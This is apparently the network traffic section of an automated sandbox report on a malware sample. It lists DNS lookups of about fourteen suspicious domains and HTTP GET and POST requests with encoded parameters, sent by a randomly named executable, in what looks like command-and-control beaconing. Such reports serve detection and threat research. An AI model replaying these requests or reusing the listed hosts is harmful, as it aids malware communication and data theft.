                                                                                                                                                                              Oct 31, 2024 01:40:26.829176903 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:27.342756987 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:28.360923052 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:28.365865946 CET8050049144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:28.365938902 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:28.374691010 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:28.380000114 CET8050049144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:29.237567902 CET8050049144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:29.373430014 CET8050049144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:29.377192020 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:29.889276981 CET5004980192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:30.909109116 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:30.914081097 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.914258003 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:30.925148010 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:30.930061102 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.930071115 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.930110931 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.930120945 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.930129051 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.930145979 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.930258036 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.930265903 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:30.930274963 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:31.773847103 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:31.852056980 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:31.907840014 CET8050050144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:31.907896996 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:32.437119007 CET5005080192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:33.455399990 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:33.460285902 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:33.460357904 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:33.467539072 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:33.472587109 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:34.328188896 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:34.373601913 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:34.463083029 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:34.465760946 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:34.482892036 CET5005180192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:34.487683058 CET8050051144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:39.503550053 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:39.508358002 CET805005234.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:39.508420944 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:39.526362896 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:39.532377958 CET805005234.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:40.504628897 CET805005234.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:40.563345909 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:40.691613913 CET805005234.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:40.691674948 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:41.029923916 CET5005280192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:42.051975965 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:42.056858063 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:42.056930065 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:42.070611954 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:42.075418949 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:43.058741093 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:43.108007908 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:43.243949890 CET805005334.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:43.245260000 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:43.576858997 CET5005380192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:44.599198103 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:44.605482101 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.605663061 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:44.619338036 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:44.627077103 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.627085924 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.627109051 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.627116919 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.627157927 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.630455017 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.630510092 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.630518913 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:44.630527973 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:45.598159075 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:45.639262915 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:45.785557985 CET805005434.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:45.785614014 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:46.124242067 CET5005480192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:47.142216921 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:47.147324085 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:47.147422075 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:47.155249119 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:47.160469055 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:48.113950014 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:48.154932976 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:48.291393995 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:48.291507959 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:48.292323112 CET5005580192.168.2.434.92.128.59
                                                                                                                                                                              Oct 31, 2024 01:40:48.297147036 CET805005534.92.128.59192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:53.321178913 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:53.325970888 CET8050056152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:53.333173990 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:53.341141939 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:53.345894098 CET8050056152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:54.386487007 CET8050056152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:54.436275005 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:54.611963987 CET8050056152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:54.613212109 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:54.842454910 CET5005680192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:55.862586021 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:55.867491961 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:55.867561102 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:55.881499052 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:55.886519909 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:56.913027048 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:56.969192028 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:57.136367083 CET8050057152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:57.137211084 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:57.393436909 CET5005780192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:58.409467936 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:58.414359093 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.414426088 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:58.427463055 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:58.649398088 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649487019 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649610043 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649678946 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649797916 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649844885 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649912119 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.649920940 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:58.650088072 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:59.441508055 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:59.498644114 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:59.654007912 CET8050058152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:59.654057026 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:40:59.936258078 CET5005880192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:00.954317093 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:00.959203005 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:41:00.959419012 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:00.965365887 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:00.970163107 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:41:02.016932011 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:41:02.061922073 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:02.245409012 CET8050059152.42.255.48192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:41:02.245500088 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:02.246767998 CET5005980192.168.2.4152.42.255.48
                                                                                                                                                                              Oct 31, 2024 01:41:02.251513004 CET8050059152.42.255.48192.168.2.4

                                                                                                                                                                              UDP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 31, 2024 01:37:49.648957014 CET5363153192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:37:49.667041063 CET53536311.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:05.486165047 CET5638053192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:38:06.419907093 CET53563801.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:20.236637115 CET5093953192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:38:20.318680048 CET53509391.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:34.220108032 CET5813753192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:38:34.255801916 CET53581371.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:38:47.924931049 CET5010253192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:38:47.937345028 CET53501021.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:01.331602097 CET5202653192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:39:01.359086037 CET53520261.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:15.252054930 CET5906453192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:39:15.270957947 CET53590641.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:28.657779932 CET5301353192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:39:29.670555115 CET5301353192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:39:30.660145998 CET53530131.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:30.660157919 CET53530131.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:44.423352957 CET5642053192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:39:44.930685043 CET53564201.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:58.330521107 CET5204353192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:39:58.398511887 CET53520431.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:11.893400908 CET5318453192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:40:12.020812035 CET53531841.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:25.788211107 CET5230253192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:40:25.820429087 CET53523021.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:39.487428904 CET5680853192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:40:39.499042988 CET53568081.1.1.1192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:53.301145077 CET6490953192.168.2.41.1.1.1
                                                                                                                                                                              Oct 31, 2024 01:40:53.314894915 CET53649091.1.1.1192.168.2.4

                                                                                                                                                                              DNS Queries

                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 31, 2024 01:37:49.648957014 CET192.168.2.41.1.1.10xae1aStandard query (0)www.iampinky.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:05.486165047 CET192.168.2.41.1.1.10x549Standard query (0)www.cotti.clubA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:20.236637115 CET192.168.2.41.1.1.10x7e38Standard query (0)www.solarand.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:34.220108032 CET192.168.2.41.1.1.10x2676Standard query (0)www.030002059.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:47.924931049 CET192.168.2.41.1.1.10x9818Standard query (0)www.xipowerplay.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:01.331602097 CET192.168.2.41.1.1.10x23f5Standard query (0)www.stationseek.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:15.252054930 CET192.168.2.41.1.1.10xac40Standard query (0)www.091210.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:28.657779932 CET192.168.2.41.1.1.10x386dStandard query (0)www.adsa6c.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:29.670555115 CET192.168.2.41.1.1.10x386dStandard query (0)www.adsa6c.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:44.423352957 CET192.168.2.41.1.1.10x20beStandard query (0)www.simplek.topA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:58.330521107 CET192.168.2.41.1.1.10xdea4Standard query (0)www.297676.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:11.893400908 CET192.168.2.41.1.1.10xee4Standard query (0)www.cesach.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:25.788211107 CET192.168.2.41.1.1.10xbbc3Standard query (0)www.basicreviews.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:39.487428904 CET192.168.2.41.1.1.10x6befStandard query (0)www.sgland06.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:53.301145077 CET192.168.2.41.1.1.10x1480Standard query (0)www.extrime1.shopA (IP address)IN (0x0001)false

                                                                                                                                                                              DNS Answers

                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 31, 2024 01:37:49.667041063 CET1.1.1.1192.168.2.40xae1aNo error (0)www.iampinky.infoiampinky.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:37:49.667041063 CET1.1.1.1192.168.2.40xae1aNo error (0)iampinky.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:37:49.667041063 CET1.1.1.1192.168.2.40xae1aNo error (0)iampinky.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:06.419907093 CET1.1.1.1192.168.2.40x549No error (0)www.cotti.club103.120.80.111A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:20.318680048 CET1.1.1.1192.168.2.40x7e38No error (0)www.solarand.onlinesolarand.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:20.318680048 CET1.1.1.1192.168.2.40x7e38No error (0)solarand.online217.160.0.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:34.255801916 CET1.1.1.1192.168.2.40x2676No error (0)www.030002059.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:47.937345028 CET1.1.1.1192.168.2.40x9818No error (0)www.xipowerplay.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:38:47.937345028 CET1.1.1.1192.168.2.40x9818No error (0)www.xipowerplay.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:01.359086037 CET1.1.1.1192.168.2.40x23f5No error (0)www.stationseek.onlinestationseek.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:01.359086037 CET1.1.1.1192.168.2.40x23f5No error (0)stationseek.online198.251.84.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:15.270957947 CET1.1.1.1192.168.2.40xac40No error (0)www.091210.xyz172.67.154.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:15.270957947 CET1.1.1.1192.168.2.40xac40No error (0)www.091210.xyz104.21.48.156A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:30.660145998 CET1.1.1.1192.168.2.40x386dNo error (0)www.adsa6c.top20.2.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:30.660157919 CET1.1.1.1192.168.2.40x386dNo error (0)www.adsa6c.top20.2.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:44.930685043 CET1.1.1.1192.168.2.40x20beNo error (0)www.simplek.top203.161.49.193A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:39:58.398511887 CET1.1.1.1192.168.2.40xdea4No error (0)www.297676.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:12.020812035 CET1.1.1.1192.168.2.40xee4No error (0)www.cesach.net217.76.156.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:25.820429087 CET1.1.1.1192.168.2.40xbbc3No error (0)www.basicreviews.onlinebasicreviews.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:25.820429087 CET1.1.1.1192.168.2.40xbbc3No error (0)basicreviews.online144.76.190.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:39.499042988 CET1.1.1.1192.168.2.40x6befNo error (0)www.sgland06.online34.92.128.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:53.314894915 CET1.1.1.1192.168.2.40x1480No error (0)www.extrime1.shopextrime1.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 31, 2024 01:40:53.314894915 CET1.1.1.1192.168.2.40x1480No error (0)extrime1.shop152.42.255.48A (IP address)IN (0x0001)false

                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                              • www.iampinky.info
                                                                                                                                                                              • www.cotti.club
                                                                                                                                                                              • www.solarand.online
                                                                                                                                                                              • www.030002059.xyz
                                                                                                                                                                              • www.xipowerplay.xyz
                                                                                                                                                                              • www.stationseek.online
                                                                                                                                                                              • www.091210.xyz
                                                                                                                                                                              • www.adsa6c.top
                                                                                                                                                                              • www.simplek.top
                                                                                                                                                                              • www.297676.com
                                                                                                                                                                              • www.cesach.net
                                                                                                                                                                              • www.basicreviews.online
                                                                                                                                                                              • www.sgland06.online
                                                                                                                                                                              • www.extrime1.shop

                                                                                                                                                                              HTTP Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.4497413.33.130.190803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:37:49.766732931 CET452OUTGET /nhtq/?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.iampinky.info
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:37:50.381314039 CET400INHTTP/1.1 200 OK
                                                                                                                                                                              Server: openresty
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:37:50 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 260
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 38 3d 30 2b 6d 55 36 66 58 34 6d 47 67 48 33 61 49 34 4b 76 6e 5a 30 44 6e 74 39 4e 4e 39 75 68 66 51 34 57 51 4c 6f 4f 39 59 4a 51 71 31 72 4c 6b 69 56 33 6d 57 65 2f 53 68 70 69 57 62 36 47 52 77 4e 38 58 4b 53 48 79 79 50 6c 7a 31 4f 44 43 32 4d 4b 30 76 59 73 78 34 45 7a 64 73 47 30 6a 30 51 65 73 47 42 6e 57 6a 52 76 79 67 42 4f 64 4b 64 6b 43 32 31 6b 34 3d 26 68 72 4f 64 3d 31 44 7a 64 49 42 5a 58 68 5a 61 48 77 32 57 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wp"}</script></head></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.449778103.120.80.111803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:06.439366102 CET704OUTPOST /3ej6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cotti.club
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cotti.club
                                                                                                                                                                              Referer: http://www.cotti.club/3ej6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4c 64 51 48 35 43 50 32 46 6c 65 53 30 51 58 34 77 58 4e 37 55 65 4b 5a 52 4a 6b 49 41 69 56 75 78 71 64 71 6c 66 57 42 76 66 49 78 41 41 39 41 79 70 45 53 4d 68 77 58 72 57 44 36 64 35 6d 67 6f 79 70 4f 62 33 6b 62 47 5a 75 54 55 47 35 4d 4d 37 43 74 42 68 42 47 49 49 2b 6b 68 30 57 4b 2b 62 78 63 41 30 4c 44 72 2f 68 70 43 42 49 59 41 56 41 73 74 41 68 38 47 66 67 4e 63 78 45 56 7a 44 74 64 39 61 45 72 39 39 61 38 31 68 44 53 74 79 74 5a 31 67 38 7a 35 44 55 5a 6e 77 34 41 6f 32 51 76 50 39 72 4c 4a 58 71 6b 32 64 6f 7a 51 4c 67 67 41 57 49 53 36 34 36 73 78 6c 4c 2f 53 77 3d 3d
